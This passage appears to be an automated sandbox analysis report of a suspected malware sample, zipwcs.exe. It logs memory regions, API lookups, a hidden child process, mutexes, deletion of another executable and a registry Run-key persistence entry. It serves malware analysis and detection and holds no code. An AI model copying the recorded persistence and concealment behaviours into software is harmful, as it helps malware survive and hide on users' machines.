|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | os_pid = 0x5bc, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE |
|
1 |
Module (16)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x750b0000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fda8 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fdb8 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x750c1700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x750c1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x750c17ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x750deceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x750c11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x750c5929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x750c11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x75166aa8 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM45C |
|
1 | |
| Create | mutex_name = PEM53C |
|
1 |
Process #17: zipwcs.exe
188
24
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:43, Reason: Child Process |
| Unmonitor | End Time: 00:04:55, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5bc |
| Parent PID | 0x53c (c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5C0
0x
73C
0x
6E4
0x
6F8
0x
6DC
0x
72C
0x
764
0x
76C
0x
680
0x
314
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001b8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00259fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00360000 | 0x003c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| zipwcs.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004cffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x004e0000 | 0x004e0fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x004e0000 | 0x004ebfff | Memory Mapped File | rw |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x01c1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c20000 | 0x01c20000 | 0x01c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01c9ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01ca0000 | 0x01f6efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x01fcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001f70000 | 0x01f70000 | 0x01f71fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x01f80000 | 0x01f87fff | Memory Mapped File | rw |
|
|
|
|
| private_0x0000000001f90000 | 0x01f90000 | 0x01fcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001fd0000 | 0x01fd0000 | 0x020aefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x021affff | Private Memory | rw |
|
|
|
- |
| zipwcs.exe | 0x021b0000 | 0x021d3fff | Memory Mapped File | r |
|
|
|
- |
| rsaenh.dll | 0x021b0000 | 0x021ebfff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x021b0000 | 0x021bffff | Memory Mapped File | rw |
|
|
|
|
| private_0x00000000021c0000 | 0x021c0000 | 0x0228ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021c0000 | 0x021c0000 | 0x021fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002200000 | 0x02200000 | 0x0223ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002240000 | 0x02240000 | 0x02240fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002240000 | 0x02240000 | 0x02240fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002250000 | 0x02250000 | 0x0228ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002290000 | 0x02290000 | 0x0233ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002290000 | 0x02290000 | 0x022cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000022d0000 | 0x022d0000 | 0x022d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000022e0000 | 0x022e0000 | 0x022e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x022fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000022f0000 | 0x022f0000 | 0x022f3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x0233ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002340000 | 0x02340000 | 0x0243ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0253ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x027bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027c0000 | 0x027c0000 | 0x027c3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x028effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028f0000 | 0x028f0000 | 0x0292ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x02aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02cdffff | Private Memory | rw |
|
|
|
- |
| dwmapi.dll | 0x72f20000 | 0x72f32fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x73320000 | 0x7339ffff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x73420000 | 0x7345bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x73600000 | 0x73607fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73610000 | 0x7366bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73670000 | 0x736aefff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74480000 | 0x74484fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74490000 | 0x744cbfff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x744d0000 | 0x744d7fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x744e0000 | 0x744edfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x744f0000 | 0x74549fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x74550000 | 0x74555fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74560000 | 0x7456ffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x74570000 | 0x74575fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x74580000 | 0x7458cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x74590000 | 0x745a4fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x745b0000 | 0x74601fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74610000 | 0x74616fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74620000 | 0x7463bfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74640000 | 0x74683fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74690000 | 0x746b0fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x746c0000 | 0x7485dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74860000 | 0x7489afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x748a0000 | 0x748b5fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x748c0000 | 0x748ccfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x748d0000 | 0x748e6fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x74900000 | 0x7490afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a20000 | 0x74a2bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74a30000 | 0x74a8ffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x74a90000 | 0x74c8afff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x74c90000 | 0x74d84fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x74d90000 | 0x74d95fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x74da0000 | 0x74e2efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74e30000 | 0x74f1ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x74f20000 | 0x74fcbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75000000 | 0x75082fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x750b0000 | 0x751bffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x751c0000 | 0x7528bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x75700000 | 0x75702fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75710000 | 0x76359fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76360000 | 0x7647cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x76480000 | 0x764dffff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x764e0000 | 0x764ebfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x764f0000 | 0x76535fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76540000 | 0x765dffff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x765e0000 | 0x76715fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76720000 | 0x76754fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x76760000 | 0x767b6fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x767f0000 | 0x767f9fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76800000 | 0x76818fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76880000 | 0x769dbfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x769e0000 | 0x76a7cfff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76a80000 | 0x76ac4fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000076ad0000 | 0x76ad0000 | 0x76bc9fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000076bd0000 | 0x76bd0000 | 0x76ceefff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x76cf0000 | 0x76e98fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x76ed0000 | 0x7704ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | type = size |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\mddefwmerged\mddefwmerged.exe | - |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = zipwcs, data = "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe", size = 104, type = REG_SZ |
|
1 |
Module (29)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x750b0000 |
|
1 | |
| Load | user32.dll | base_address = 0x75570000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x76540000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75710000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x76360000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x765e0000 |
|
1 | |
| Load | userenv.dll | base_address = 0x748d0000 |
|
1 | |
| Load | wininet.dll | base_address = 0x74c90000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x748c0000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe | base_address = 0x400000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fda8 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fdb8 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x750c1700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x750c1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x750c17ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x750deceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x750c11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x750c5929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x750c11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x75166aa8 |
|
1 | |
| Create Mapping | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | filename = C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | process_name = c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe, desired_access = FILE_MAP_READ |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (132)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 20576 |
|
3 | |
| Get Time | type = Ticks, time = 21590 |
|
1 | |
| Get Time | type = Ticks, time = 22604 |
|
1 | |
| Get Time | type = Ticks, time = 23618 |
|
1 | |
| Get Time | type = Ticks, time = 24632 |
|
1 | |
| Get Time | type = Ticks, time = 25646 |
|
1 | |
| Get Time | type = Ticks, time = 26660 |
|
1 | |
| Get Time | type = Ticks, time = 26722 |
|
2 | |
| Get Time | type = Ticks, time = 27674 |
|
1 | |
| Get Time | type = Ticks, time = 28688 |
|
1 | |
| Get Time | type = Ticks, time = 29702 |
|
1 | |
| Get Time | type = Ticks, time = 30716 |
|
1 | |
| Get Time | type = Ticks, time = 31730 |
|
1 | |
| Get Time | type = Ticks, time = 32744 |
|
1 | |
| Get Time | type = Ticks, time = 32869 |
|
2 | |
| Get Time | type = Ticks, time = 33758 |
|
1 | |
| Get Time | type = Ticks, time = 34772 |
|
1 | |
| Get Time | type = Ticks, time = 35786 |
|
1 | |
| Get Time | type = Ticks, time = 36800 |
|
1 | |
| Get Time | type = Ticks, time = 37814 |
|
1 | |
| Get Time | type = Ticks, time = 38828 |
|
3 | |
| Get Time | type = Ticks, time = 39515 |
|
1 | |
| Get Time | type = Ticks, time = 39842 |
|
1 | |
| Get Time | type = Ticks, time = 40856 |
|
1 | |
| Get Time | type = Ticks, time = 41870 |
|
1 | |
| Get Time | type = Ticks, time = 42884 |
|
3 | |
| Get Time | type = Ticks, time = 63960 |
|
4 | |
| Get Time | type = Ticks, time = 64802 |
|
1 | |
| Get Time | type = Ticks, time = 65192 |
|
1 | |
| Get Time | type = Ticks, time = 66206 |
|
1 | |
| Get Time | type = Ticks, time = 67220 |
|
1 | |
| Get Time | type = Ticks, time = 68234 |
|
1 | |
| Get Time | type = Ticks, time = 69248 |
|
1 | |
| Get Time | type = Ticks, time = 70262 |
|
1 | |
| Get Time | type = Ticks, time = 71276 |
|
1 | |
| Get Time | type = Ticks, time = 72290 |
|
1 | |
| Get Time | type = Ticks, time = 73304 |
|
1 | |
| Get Time | type = Ticks, time = 74318 |
|
1 | |
| Get Time | type = Ticks, time = 75332 |
|
1 | |
| Get Time | type = Ticks, time = 76346 |
|
1 | |
| Get Time | type = Ticks, time = 77360 |
|
1 | |
| Get Time | type = Ticks, time = 78374 |
|
1 | |
| Get Time | type = Ticks, time = 79388 |
|
1 | |
| Get Time | type = Ticks, time = 80402 |
|
1 | |
| Get Time | type = Ticks, time = 81416 |
|
1 | |
| Get Time | type = Ticks, time = 82430 |
|
1 | |
| Get Time | type = Ticks, time = 83444 |
|
1 | |
| Get Time | type = Ticks, time = 84458 |
|
1 | |
| Get Time | type = Ticks, time = 85472 |
|
1 | |
| Get Time | type = Ticks, time = 86486 |
|
1 | |
| Get Time | type = Ticks, time = 87500 |
|
1 | |
| Get Time | type = Ticks, time = 88514 |
|
1 | |
| Get Time | type = Ticks, time = 89528 |
|
1 | |
| Get Time | type = Ticks, time = 90542 |
|
1 | |
| Get Time | type = Ticks, time = 91556 |
|
1 | |
| Get Time | type = Ticks, time = 92570 |
|
1 | |
| Get Time | type = Ticks, time = 93584 |
|
1 | |
| Get Time | type = Ticks, time = 94599 |
|
1 | |
| Get Time | type = Ticks, time = 95613 |
|
1 | |
| Get Time | type = Ticks, time = 96627 |
|
1 | |
| Get Time | type = Ticks, time = 97641 |
|
1 | |
| Get Time | type = Ticks, time = 98655 |
|
1 | |
| Get Time | type = Ticks, time = 99669 |
|
1 | |
| Get Time | type = Ticks, time = 100683 |
|
1 | |
| Get Time | type = Ticks, time = 101697 |
|
1 | |
| Get Time | type = Ticks, time = 102711 |
|
1 | |
| Get Time | type = Ticks, time = 103725 |
|
1 | |
| Get Time | type = Ticks, time = 104739 |
|
1 | |
| Get Time | type = Ticks, time = 105753 |
|
1 | |
| Get Time | type = Ticks, time = 106767 |
|
1 | |
| Get Time | type = Ticks, time = 107781 |
|
1 | |
| Get Time | type = Ticks, time = 108795 |
|
1 | |
| Get Time | type = Ticks, time = 109809 |
|
1 | |
| Get Time | type = Ticks, time = 110823 |
|
1 | |
| Get Time | type = Ticks, time = 111837 |
|
1 | |
| Get Time | type = Ticks, time = 112851 |
|
1 | |
| Get Time | type = Ticks, time = 113865 |
|
1 | |
| Get Time | type = Ticks, time = 114879 |
|
1 | |
| Get Time | type = Ticks, time = 115893 |
|
1 | |
| Get Time | type = Ticks, time = 116907 |
|
1 | |
| Get Time | type = Ticks, time = 117921 |
|
1 | |
| Get Time | type = Ticks, time = 118935 |
|
1 | |
| Get Time | type = Ticks, time = 119949 |
|
1 | |
| Get Time | type = Ticks, time = 120963 |
|
1 | |
| Get Time | type = Ticks, time = 121977 |
|
1 | |
| Get Time | type = Ticks, time = 122991 |
|
1 | |
| Get Time | type = Ticks, time = 124005 |
|
1 | |
| Get Time | type = Ticks, time = 125019 |
|
1 | |
| Get Time | type = Ticks, time = 126064 |
|
1 | |
| Get Time | type = Ticks, time = 127078 |
|
1 | |
| Get Time | type = Ticks, time = 128092 |
|
1 | |
| Get Time | type = Ticks, time = 129106 |
|
1 | |
| Get Time | type = Ticks, time = 130120 |
|
1 | |
| Get Time | type = Ticks, time = 131134 |
|
1 | |
| Get Time | type = Ticks, time = 132148 |
|
1 | |
| Get Time | type = Ticks, time = 133162 |
|
1 | |
| Get Time | type = Ticks, time = 134176 |
|
1 | |
| Get Time | type = Ticks, time = 135190 |
|
1 | |
| Get Time | type = Ticks, time = 136204 |
|
1 | |
| Get Time | type = Ticks, time = 137218 |
|
1 | |
| Get Time | type = Ticks, time = 138232 |
|
1 | |
| Get Time | type = Ticks, time = 139246 |
|
1 | |
| Get Time | type = Ticks, time = 140260 |
|
1 | |
| Get Time | type = Ticks, time = 141274 |
|
1 | |
| Get Time | type = Ticks, time = 142288 |
|
1 | |
| Get Time | type = Ticks, time = 143302 |
|
1 | |
| Get Time | type = Ticks, time = 144316 |
|
1 | |
| Get Time | type = Ticks, time = 145330 |
|
1 | |
| Get Time | type = Ticks, time = 146344 |
|
1 | |
| Get Time | type = Ticks, time = 147358 |
|
1 | |
| Get Time | type = Ticks, time = 148372 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
3 |
